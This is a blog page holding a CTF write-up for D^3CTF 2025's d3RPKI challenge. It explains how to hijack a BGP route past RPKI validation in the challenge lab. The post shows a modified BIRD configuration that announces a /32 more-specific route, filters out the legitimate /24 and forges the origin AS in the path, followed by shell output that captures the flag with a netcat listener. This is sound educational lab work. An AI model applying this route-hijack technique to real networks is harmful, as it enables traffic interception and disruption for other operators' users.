
  <!DOCTYPE html>
  <html lang="en"  data-theme="dark" >
  <head>
  <meta charset="utf-8">
  

  

  

  <script>window.REIMU_CONFIG = {};window.REIMU_CONFIG.icon_font = '4552607_bq08450reo';window.REIMU_CONFIG.clipboard_tips = {"success":"Copy Successful","fail":"Copy Failed","copyright":{"enable":false,"count":50,"content":"本文版权：本博客所有文章除特别声明外，均采用 BY-NC-SA 许可协议。转载请注明出处！"}};window.REIMU_CONFIG.code_block = {"expand":true};</script>
  
  <title>
    D^3CTF 2025 |
    
    Harsh
  </title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin><link rel="preload" as="style" href="https://fonts.googleapis.com/css?family=Mulish:400,400italic,700,700italic%7CNoto%20Serif%20SC:400,400italic,700,700italic%7CSource%20Code%20Pro:400,400italic,700,700italic&display=swap"><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Mulish:400,400italic,700,700italic%7CNoto%20Serif%20SC:400,400italic,700,700italic%7CSource%20Code%20Pro:400,400italic,700,700italic&display=swap" media="print" onload="this.media&#x3D;&#39;all&#39;">
  
    <link rel="preload" href="//at.alicdn.com/t/c/font_4552607_bq08450reo.woff2" as="font" type="font/woff2" crossorigin="anonymous">
  
  
    
<link rel="stylesheet" href="/css/loader.css">

  
  
    <meta name="description" content="D^3CTF 2025!Organized by @Vidar, @CNSS, @L-Team, the 6th D^3CTF. D^3 means “the cube of Dian”, i.e., the cube of “electronic” in Chinese. As the three teams co-hosting this CTF game come from three “U">
<meta property="og:type" content="article">
<meta property="og:title" content="D^3CTF 2025">
<meta property="og:url" content="https://harshgdev.github.io/2025/06/03/D^3CTF-2025/index.html">
<meta property="og:site_name" content="Harsh">
<meta property="og:description" content="D^3CTF 2025!Organized by @Vidar, @CNSS, @L-Team, the 6th D^3CTF. D^3 means “the cube of Dian”, i.e., the cube of “electronic” in Chinese. As the three teams co-hosting this CTF game come from three “U">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://harshgdev.github.io/images/posts/2025-d%5E3ctf/cover.png">
<meta property="article:published_time" content="2025-06-03T11:38:16.000Z">
<meta property="article:modified_time" content="2025-06-03T13:30:35.801Z">
<meta property="article:author" content="Harsh">
<meta property="article:tag" content="bgp">
<meta property="article:tag" content="networking">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://harshgdev.github.io/images/posts/2025-d%5E3ctf/cover.png">
  
  
    <link rel="alternate" href="/atom.xml" title="Harsh" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/images/favicon.ico">
  
  
<link rel="stylesheet" href="/css/style.css">

  <link rel="preload" href="https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.css" as="style" onload="this.onload=null;this.rel='stylesheet'">
  
    
      
        
<link rel="stylesheet" href="https://npm.webcache.cn/katex@0.16.11/dist/katex.min.css">

      
    
  
  
  
  
    
<script src="https://npm.webcache.cn/pace-js@1.2.4/pace.min.js" integrity="sha384-k6YtvFUEIuEFBdrLKJ3YAUbBki333tj1CSUisai5Cswsg9wcLNaPzsTHDswp4Az8" crossorigin="anonymous"></script>

  
  
    
<link rel="stylesheet" href="https://npm.webcache.cn/@reimujs/aos@0.1.0/dist/aos.css">

  
  
<meta name="generator" content="Hexo 7.3.0"></head>

  <body>
    
  <div id='loader'>
    <div class="loading-left-bg loading-bg"></div>
    <div class="loading-right-bg loading-bg"></div>
    <div class="spinner-box">
      <div class="loading-taichi">
        
          <svg width="150" height="150" viewBox="0 0 1024 1024" class="icon" version="1.1" xmlns="https://www.w3.org/2000/svg" shape-rendering="geometricPrecision">
            <path d="M303.5 432A80 80 0 0 1 291.5 592A80 80 0 0 1 303.5 432z" fill="var(--red-1, #ff5252)" />
            <path d="M512 65A447 447 0 0 1 512 959L512 929A417 417 0 0 0 512 95A417 417 0 0 0 512 929L512 959A447 447 0 0 1 512 65z 
           M512 95A417 417 0 0 1 929 512A208.5 208.5 0 0 1 720.5 720.5L720.5 592A80 80 0 0 0 720.5 432A80 80 0 0 0 720.5 592L720.5 720.5A208.5 208.5 0 0 1 512 512A208.5 208.5 0 0 0 303.5 303.5A208.5 208.5 0 0 0 95 512A417 417 0 0 1 512 95z" fill="var(--red-1, #ff5252)" />
          </svg>
        
      </div>
      <div class="loading-word">Loading...</div>
    </div>
  </div>
  </div>
  <script>
    var time = null;
    var startLoading = () => {
      time = Date.now();
      document.getElementById('loader').classList.remove("loading");
    }
    var endLoading = () => {
      if (!time) {
        document.body.style.overflow = 'auto';
        document.getElementById('loader').classList.add("loading");
      } else {
        if (Date.now() - time > 500) {
          time = null;
          document.body.style.overflow = 'auto';
          document.getElementById('loader').classList.add("loading");
        } else {
          setTimeout(endLoading, 500 - (Date.now() - time));
          time = null;
        }
      }
    }
    window.addEventListener('DOMContentLoaded', endLoading);
    document.getElementById('loader').addEventListener('click', endLoading);
  </script>

<div id="copy-tooltip" style="pointer-events: none; opacity: 0; transition: all 0.2s ease; position: fixed;top: 50%;left: 50%;z-index: 999;transform: translate(-50%, -50%);color: white;background: rgba(0, 0, 0, 0.5);padding: 10px 15px;border-radius: 10px;">
</div>


    <div id="container">
      <div id="wrap">
        <div id="header-nav">
  <nav id="main-nav">
    
      
        <span class="main-nav-link-wrap">
          <div class="main-nav-icon icon rotate">
            &#xe62b;
          </div>
          <a class="main-nav-link" href="/">Home</a>
        </span>
      
        <span class="main-nav-link-wrap">
          <div class="main-nav-icon icon rotate">
            &#xe62b;
          </div>
          <a class="main-nav-link" href="/archives">Archives</a>
        </span>
      
        <span class="main-nav-link-wrap">
          <div class="main-nav-icon icon rotate">
            &#xe62b;
          </div>
          <a class="main-nav-link" href="/about">About</a>
        </span>
      
    
    <a id="main-nav-toggle" class="nav-icon"></a>
  </nav>
  <nav id="sub-nav">
    
    
    
      <a id="nav-search-btn" class="nav-icon popup-trigger" title="Search"></a>
    
  </nav>
</div>
<header id="header">
  
    <picture></picture>
    <img fetchpriority="high" src="/images/posts/2025-d%5E3ctf/cover.png" alt="D^3CTF 2025">
  
  <div id="header-outer">
    <div id="header-title">
      
        
        
          <a href="/" id="logo">
            <h1 data-aos="slide-up">D^3CTF 2025</h1>
          </a>
        
      
      
        
        <h2 id="subtitle-wrap" data-aos="slide-down">
          
        </h2>
      
    </div>
  </div>
</header>

        <div id="content" class="sidebar-left"  >
          <aside id="sidebar">
  
  
  <div class="sidebar-wrapper wrap-sticky">
    <div class="sidebar-wrap" data-aos="fade-up">
      
        <div class="sidebar-toc-sidebar"><div class="sidebar-toc">
  <h3 class="toc-title">Contents</h3>
  <div class="sidebar-toc-wrapper toc-div-class" >
      
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Misc-Networking"><span class="toc-number">1.</span> <span class="toc-text">Misc-Networking</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#d3RPKI"><span class="toc-number">1.1.</span> <span class="toc-text">d3RPKI</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#Challenge-Description"><span class="toc-number">1.1.1.</span> <span class="toc-text">Challenge Description</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Solution"><span class="toc-number">1.1.2.</span> <span class="toc-text">Solution</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Flag"><span class="toc-number">1.1.3.</span> <span class="toc-text">Flag</span></a></li></ol></li></ol></li></ol>
      
  </div>
</div>
</div>
        <div class="sidebar-common-sidebar hidden"><div class="sidebar-author">
  <img data-src="/avatar/saturo-running-v1-6-2.gif" data-sizes="auto" alt="Harsh" class="lazyload">
  <div class="sidebar-author-name">Harsh</div>
  <div class="sidebar-description">21 | Dev &amp; CTF Player | IN</div>
</div>
<div class="sidebar-state">
  <div class="sidebar-state-article">
    <div>Posts</div>
    <div class="sidebar-state-number">10</div>
  </div>
  <div class="sidebar-state-category">
    <div>Categories</div>
    <div class="sidebar-state-number">2</div>
  </div>
  <div class="sidebar-state-tag">
    <div>Tags</div>
    <div class="sidebar-state-number">19</div>
  </div>
</div>
<div class="sidebar-social">
  
    <div class="icon-email sidebar-social-icon">
      <a href=mailto:notsoharsh13@gmail.com itemprop="url" target="_blank" aria-label="email" rel="noopener external nofollow noreferrer"></a>
    </div>
  
    <div class="icon-github sidebar-social-icon">
      <a href=https://github.com/harshgdev itemprop="url" target="_blank" aria-label="github" rel="noopener external nofollow noreferrer"></a>
    </div>
  
    <div class="icon-twitter sidebar-social-icon">
      <a href=https://x.com/harshgdev itemprop="url" target="_blank" aria-label="twitter" rel="noopener external nofollow noreferrer"></a>
    </div>
  
    <div class="icon-linkedin sidebar-social-icon">
      <a href=https://www.linkedin.com/in/harsh-gupta-b5792a280 itemprop="url" target="_blank" aria-label="linkedin" rel="noopener external nofollow noreferrer"></a>
    </div>
  
    <div class="icon-discord sidebar-social-icon">
      <a href=https://discordapp.com/users/509689286589939713 itemprop="url" target="_blank" aria-label="discord" rel="noopener external nofollow noreferrer"></a>
    </div>
  
</div>
<div class="sidebar-menu">
  
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/" aria-label="Home"></a>
        <div class="sidebar-menu-icon icon rotate">
          &#xe62b;
        </div>
        <div class="sidebar-menu-link">Home</div>
      </div>
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/archives" aria-label="Archives"></a>
        <div class="sidebar-menu-icon icon rotate">
          &#xe62b;
        </div>
        <div class="sidebar-menu-link">Archives</div>
      </div>
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/about" aria-label="About"></a>
        <div class="sidebar-menu-icon icon rotate">
          &#xe62b;
        </div>
        <div class="sidebar-menu-link">About</div>
      </div>
    
  
</div>
</div>
      
      <!-- 
        <div class="sidebar-btn-wrapper" style="position:static">
          <div class="sidebar-toc-btn current"></div>
          <div class="sidebar-common-btn"></div>
        </div>
       -->
    </div>
  </div>

  <div class="sidebar-widget">
  
  </div>
</aside>

          <section id="main"><article id="post-D^3CTF-2025" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-inner" data-aos="fade-up">
    <div class="article-meta">
      <div class="article-date">
  <a href="/2025/06/03/D%5E3CTF-2025/" class="article-date-link" data-aos="zoom-in">
    <time datetime="2025-06-03T11:38:16.000Z" itemprop="datePublished">2025-06-03</time>
    <time style="display: none;" id="post-update-time">2025-06-03</time>
  </a>
</div>

      
  <div class="article-category">
    <a class="article-category-link" href="/categories/CTF-Writeups/" data-aos="zoom-in">CTF-Writeups</a>
  </div>


    </div>
    <div class="hr-line"></div>
    

    <div class="e-content article-entry" itemprop="articleBody">
      
      
        <p>D^3CTF 2025!<br>Organized by @Vidar, @CNSS, @L-Team, the 6th D^3CTF.</p>
<p>D^3 means “the cube of Dian”, i.e., the cube of “electronic” in Chinese. As the three teams co-hosting this CTF game come from three “University of Electronic” in China (UESTC, Xidian, HDU).</p>
<p>I participated in D^3CTF 2025, as a member of my institute’s club, InfoSecIITR. This writeup details the challenge I attempted during the competition.</p>
<h2 id="Misc-Networking"><a href="#Misc-Networking" class="headerlink" title="Misc-Networking"></a>Misc-Networking</h2><h3 id="d3RPKI"><a href="#d3RPKI" class="headerlink" title="d3RPKI"></a>d3RPKI</h3><h4 id="Challenge-Description"><a href="#Challenge-Description" class="headerlink" title="Challenge Description"></a>Challenge Description</h4><p>After 2 network challenges in D^3CTF 2024 and 2021, here comes the third one.</p>
<p>在 D^3CTF 2024 and 2021 的两个网络题后，第三个网络题这就来了。</p>
<p>It’s time to test your network skill by hacking our BGP network.</p>
<p>是时候在我们的 BGP 网络中展现你的配网水平了。</p>
<p>Plz connect with ssh, login as root and the passwd is also root.</p>
<p>请使用 ssh 链接靶机，账户密码都是 root</p>
<p>It always takes at least 5 minutes to setup the environment, so it’s recommended to use local environment first.</p>
<p>靶机起码要开五分钟，别急，可以先试试本地</p>
<p>Attachments: <a href="/images/posts/2025-d%5E3ctf/src.zip">src.zip</a></p>
<h4 id="Solution"><a href="#Solution" class="headerlink" title="Solution"></a>Solution</h4><p>Unfortunately, I was only able to solve this challenge partially during the competition—I missed a minor but crucial step.</p>
<p>The challenge name mentions “RPKI” (Resource Public Key Infrastructure), which is used to secure BGP.</p>
<p><strong>Network Topology</strong></p>
<ul>
<li>t1 (AS 4211110001) - Main router at 10.1.0.1, acts as RPKI validator</li>
<li>t2-1 (AS 4211110002) - Router at 10.2.0.1 where we’re currently located</li>
<li>t2-2 (AS 4211110003) - Router at 10.3.0.1, contains the flag and sends it to 10.4.0.5:1234</li>
<li>t2-3 (AS 4211110004) - Router at 10.4.0.1</li>
</ul>
<p><strong>Docker Compose (compose.yml)</strong></p>
<p>Sets up the network topology with:</p>
<ul>
<li>Multiple networks using macvlan drivers for Layer 2 connectivity</li>
<li>Each container gets specific IP addresses on different subnets</li>
<li>NET_ADMIN capabilities for network manipulation</li>
<li>Port 2233 mapped to SSH on t2-1 for external access</li>
</ul>
<p><strong>BGP Routing (bird.conf files)</strong></p>
<p>Each router runs BIRD (BGP daemon) configured to:</p>
<ul>
<li>Establish BGP peering relationships between routers</li>
<li>Use ROA (Route Origin Authorization) validation via RPKI</li>
<li>Filter routes based on ROA validation to prevent route hijacking</li>
<li>Advertise static routes for their local subnets</li>
</ul>
<p><strong>RPKI&#x2F;ROA System (roa_stayrtr.json)</strong></p>
<ul>
<li>t1 runs StayRTR as an RPKI cache server</li>
<li>roa_stayrtr.json defines valid route origins for each AS</li>
<li>Other routers connect to t1’s RPKI cache for route validation</li>
<li>Routes failing ROA validation are rejected</li>
</ul>
<p>The challenge title and the provided files clearly indicate a BGP route hijacking attack that exploits a fundamental limitation in RPKI.</p>
<p><strong>The RPKI Limitation</strong></p>
<p>RPKI validates that a specific network prefix (like 10.4.0.0&#x2F;24) is authorized to be announced by a particular AS (like AS 4211110004). However, <em>RPKI doesn’t verify WHO is actually making the announcement</em> - it only checks if the announced prefix and AS number combination is valid.</p>
<p><strong>The Attack Strategy</strong></p>
<p>The goal is to intercept the flag that t2-2 is sending to 10.4.0.5:1234. To do this, the attacker needs to:</p>
<ol>
<li>Hijack the IP 10.4.0.5 by making other routers believe traffic to that IP should come through the attacker</li>
<li>Bypass RPKI validation by making the hijacked route appear legitimate</li>
</ol>
<p>Upon logging in via <code>SSH</code>, we’re provided with limited commands and already have access to the <code>BIRD</code> config files. We can use commands like <code>bird</code>, <code>birdc</code>, <code>nc</code>, etc.</p>
<p>Configuring bird.conf on t2-1</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br></pre></td><td class="code"><pre><span class="line">$ ssh root@35.241.98.126 -p 30921</span><br><span class="line">root@b04002374330:~# vi /etc/bird/bird.conf</span><br><span class="line">root@b04002374330:~# birdc configure</span><br><span class="line">BIRD 2.14 ready.</span><br><span class="line">Reading configuration from /etc/bird/bird.conf</span><br><span class="line">Reconfigured</span><br><span class="line">root@b04002374330:~# <span class="built_in">cat</span> /etc/bird/bird.conf</span><br><span class="line"><span class="built_in">log</span> syslog all;</span><br><span class="line">debug protocols all;</span><br><span class="line"></span><br><span class="line">router <span class="built_in">id</span> 10.2.0.1;</span><br><span class="line"></span><br><span class="line">ipv4 table BGP_table;</span><br><span class="line"></span><br><span class="line">protocol device&#123;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">protocol kernel&#123;</span><br><span class="line">    scan <span class="keyword">time</span> 10;</span><br><span class="line">    ipv4 &#123;</span><br><span class="line">        <span class="built_in">export</span> all;</span><br><span class="line">        import none;</span><br><span class="line">    &#125;;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">protocol static &#123;</span><br><span class="line">    ipv4 &#123;</span><br><span class="line">        table BGP_table;</span><br><span class="line">        import all;</span><br><span class="line">        <span class="built_in">export</span> none;</span><br><span class="line">    &#125;;</span><br><span class="line"></span><br><span class="line">    route 10.2.0.0/24 reject;</span><br><span class="line">    <span class="comment"># Added this</span></span><br><span class="line">    route 10.4.0.5/32 reject;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">roa4 table r4;</span><br><span class="line"></span><br><span class="line">protocol rpki &#123;</span><br><span class="line">        debug all;</span><br><span class="line"></span><br><span class="line">        roa4 &#123; table r4; &#125;;</span><br><span class="line"></span><br><span class="line">        remote <span class="string">&quot;10.0.0.1&quot;</span> port 8083;</span><br><span class="line"></span><br><span class="line">        retry keep 5;</span><br><span class="line">        refresh keep 30;</span><br><span class="line">        expire 600;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">template bgp BGP_peers &#123;</span><br><span class="line">    ipv4 &#123;</span><br><span class="line">        table BGP_table;</span><br><span class="line">        import filter&#123;</span><br><span class="line">            <span class="comment"># Added this</span></span><br><span class="line">            <span class="keyword">if</span> net = 10.4.0.0/24 <span class="keyword">then</span> reject;</span><br><span class="line">            <span class="keyword">if</span> roa_check(r4, net, bgp_path.last) !~ [ROA_VALID] <span class="keyword">then</span> &#123;</span><br><span class="line">                <span class="built_in">print</span> <span class="string">&quot;ROA check failed for &quot;</span>, net, <span class="string">&quot; ASN &quot;</span>, bgp_path.last;</span><br><span class="line">                reject;</span><br><span class="line">            &#125;</span><br><span class="line">            accept;</span><br><span class="line">        &#125;;</span><br><span class="line">        <span class="built_in">export</span> filter &#123;</span><br><span class="line">            <span class="comment">#Added this</span></span><br><span class="line">            <span class="keyword">if</span> net = 10.4.0.5/32 <span class="keyword">then</span> &#123;</span><br><span class="line">                bgp_path.prepend(4211110004);</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">if</span> <span class="built_in">source</span> ~ [RTS_STATIC, RTS_BGP] <span class="keyword">then</span> accept;</span><br><span class="line">            reject;</span><br><span class="line">        &#125;;</span><br><span class="line">    &#125;;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">protocol pipe &#123;</span><br><span class="line">    table master4;</span><br><span class="line">    peer table BGP_table;</span><br><span class="line">    import filter &#123;</span><br><span class="line">        <span class="keyword">if</span> <span class="built_in">source</span> = RTS_STATIC <span class="keyword">then</span> reject;</span><br><span class="line">        krt_prefsrc = 10.2.0.1;</span><br><span class="line">        accept;</span><br><span class="line">    &#125;;</span><br><span class="line">    <span class="built_in">export</span> none;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">protocol bgp t1 from BGP_peers &#123;</span><br><span class="line">    <span class="built_in">local</span> 10.0.0.2 as 4211110002;</span><br><span class="line">    neighbor 10.0.0.1 as 4211110001;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<ol>
<li>Add a Static Route</li>
</ol>
<p><code>route 10.4.0.5/32 reject;  # More specific route than the /24</code></p>
<p>This creates a more specific route (&#x2F;32 is more specific than &#x2F;24) that will be preferred by BGP.</p>
<ol start="2">
<li>Filter Incoming Routes</li>
</ol>
<p><code>if net = 10.4.0.0/24 then reject;</code></p>
<p>Block the legitimate route announcement for the entire 10.4.0.0&#x2F;24 subnet.</p>
<ol start="3">
<li>Forge the AS-PATH</li>
</ol>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">if net = 10.4.0.5/32 then &#123; </span><br><span class="line">    bgp_path.prepend(4211110004); </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>When announcing the hijacked route, prepend AS 4211110004 to the AS-PATH. This makes it appear as if the route is legitimately coming from AS 4211110004.</p>
<p>I missed Step 3 during the competition.  :(</p>
<p><strong>Why This Works</strong></p>
<ul>
<li><p>More Specific Route: The &#x2F;32 route is more specific than any &#x2F;24 route, so it will be preferred.</p>
</li>
<li><p>RPKI Validation Passes: Because the AS-PATH shows AS 4211110004 as the origin, and the ROA table says AS 4211110004 is authorized for 10.4.0.0&#x2F;16, RPKI validation succeeds.</p>
</li>
<li><p>Traffic Redirection: Other routers will now send traffic destined for 10.4.0.5 to the attacker instead of the legitimate destination.</p>
</li>
</ul>
<p>Further lookup for the IP 10.4.0.5:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br></pre></td><td class="code"><pre><span class="line">root@b04002374330:~# ip addr add 10.4.0.5/32 dev lo</span><br><span class="line">root@b04002374330:~# birdc show route table master4</span><br><span class="line">BIRD 2.14 ready.</span><br><span class="line">Table master4:</span><br><span class="line">10.3.0.0/24          unicast [t1 12:56:29.380] * (100) [AS4211110003i]</span><br><span class="line">        via 10.0.0.1 on eth1</span><br><span class="line">10.1.0.0/24          unicast [t1 12:56:29.380] * (100) [AS4211110001i]</span><br><span class="line">        via 10.0.0.1 on eth1</span><br><span class="line">root@b04002374330:~# birdc show route table BGP_table</span><br><span class="line">BIRD 2.14 ready.</span><br><span class="line">Table BGP_table:</span><br><span class="line">10.3.0.0/24          unicast [t1 12:56:29.380] * (100) [AS4211110003i]</span><br><span class="line">        via 10.0.0.1 on eth1</span><br><span class="line">10.1.0.0/24          unicast [t1 12:56:29.380] * (100) [AS4211110001i]</span><br><span class="line">        via 10.0.0.1 on eth1</span><br><span class="line">10.2.0.0/24          unreachable [static1 12:56:29.032] * (200)</span><br><span class="line">10.4.0.5/32          unreachable [static1 13:01:46.543] * (200)</span><br><span class="line">root@b04002374330:~# birdc show protocols</span><br><span class="line">BIRD 2.14 ready.</span><br><span class="line">Name       Proto      Table      State  Since         Info</span><br><span class="line">device1    Device     ---        up     12:56:29.032</span><br><span class="line">kernel1    Kernel     master4    up     12:56:29.032</span><br><span class="line">static1    Static     BGP_table  up     12:56:29.032</span><br><span class="line">rpki1      RPKI       ---        up     12:56:29.272  Established</span><br><span class="line">pipe1      Pipe       ---        up     12:56:29.032  master4 &lt;=&gt; BGP_table</span><br><span class="line">t1         BGP        ---        up     12:56:29.350  Established</span><br><span class="line">root@b04002374330:~# birdc show route</span><br><span class="line">BIRD 2.14 ready.</span><br><span class="line">Table master4:</span><br><span class="line">10.3.0.0/24          unicast [t1 12:56:29.380] * (100) [AS4211110003i]</span><br><span class="line">        via 10.0.0.1 on eth1</span><br><span class="line">10.1.0.0/24          unicast [t1 12:56:29.380] * (100) [AS4211110001i]</span><br><span class="line">        via 10.0.0.1 on eth1</span><br><span class="line"></span><br><span class="line">Table r4:</span><br><span class="line">10.3.0.0/16-32 AS4211110003  [rpki1 12:56:29.279] * (100)</span><br><span class="line">10.4.0.0/16-32 AS4211110004  [rpki1 12:56:29.279] * (100)</span><br><span class="line">10.1.0.0/16-32 AS4211110001  [rpki1 12:56:29.279] * (100)</span><br><span class="line">10.2.0.0/16-32 AS4211110002  [rpki1 12:56:29.279] * (100)</span><br><span class="line">root@b04002374330:~# ip addr</span><br><span class="line">1: lo: &lt;LOOPBACK,UP,LOWER_UP&gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000</span><br><span class="line">    <span class="built_in">link</span>/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00</span><br><span class="line">    inet 127.0.0.1/8 scope host lo</span><br><span class="line">       valid_lft forever preferred_lft forever</span><br><span class="line">    inet 10.4.0.5/32 scope global lo</span><br><span class="line">       valid_lft forever preferred_lft forever</span><br><span class="line">    inet6 ::1/128 scope host</span><br><span class="line">       valid_lft forever preferred_lft forever</span><br><span class="line">2: eth0@if12: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc noqueue state UP group default</span><br><span class="line">    <span class="built_in">link</span>/ether 32:fa:13:6b:1d:07 brd ff:ff:ff:ff:ff:ff link-netnsid 0</span><br><span class="line">    inet 100.64.24.2/24 brd 100.64.24.255 scope global eth0</span><br><span class="line">       valid_lft forever preferred_lft forever</span><br><span class="line">21: eth1@if10: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc noqueue state UP group default</span><br><span class="line">    <span class="built_in">link</span>/ether 16:4b:07:36:c2:b8 brd ff:ff:ff:ff:ff:ff link-netnsid 0</span><br><span class="line">    inet 10.0.0.2/24 brd 10.0.0.255 scope global eth1</span><br><span class="line">       valid_lft forever preferred_lft forever</span><br><span class="line">22: eth2@if7: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc noqueue state UP group default</span><br><span class="line">    <span class="built_in">link</span>/ether 2a:07:3b:54:76:5e brd ff:ff:ff:ff:ff:ff link-netnsid 0</span><br><span class="line">    inet 10.2.0.1/24 brd 10.2.0.255 scope global eth2</span><br><span class="line">       valid_lft forever preferred_lft forever</span><br></pre></td></tr></table></figure>

<p>The route for 10.4.0.5&#x2F;32 is now in place and reachable via our node. Let’s listen through Netcat command:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">root@b04002374330:~# nc -lvp 1234</span><br><span class="line">Ncat: Version 7.94SVN ( https://nmap.org/ncat )</span><br><span class="line">Ncat: Listening on [::]:1234</span><br><span class="line">Ncat: Listening on 0.0.0.0:1234</span><br><span class="line">Ncat: Connection from 10.3.0.1:41534.</span><br><span class="line">d3ctf&#123;c9780467-2ff8-4ccf-96e1-49b36e3f6822&#125;</span><br></pre></td></tr></table></figure>

<p>We got our flag from t2-2 with IP as <code>10.3.0.1</code>.</p>
<p><img src="/images/posts/2025-d%5E3ctf/flag.png" alt="Flag Submission"></p>
<h4 id="Flag"><a href="#Flag" class="headerlink" title="Flag"></a>Flag</h4><figure class="highlight yaml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">d3ctf&#123;c9780467-2ff8-4ccf-96e1-49b36e3f6822&#125;</span></span><br></pre></td></tr></table></figure>
      
    </div>
    <footer class="article-footer">
      
      
      
      
      
      
      
      
      
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item" data-aos="zoom-in"><a class="article-tag-list-link" href="/tags/bgp/" rel="tag">bgp</a></li><li class="article-tag-list-item" data-aos="zoom-in"><a class="article-tag-list-link" href="/tags/networking/" rel="tag">networking</a></li></ul>


    </footer>
  </div>
  
  <nav id="article-nav" data-aos="fade-up">
    
      <div class="article-nav-link-wrap article-nav-link-left">
        
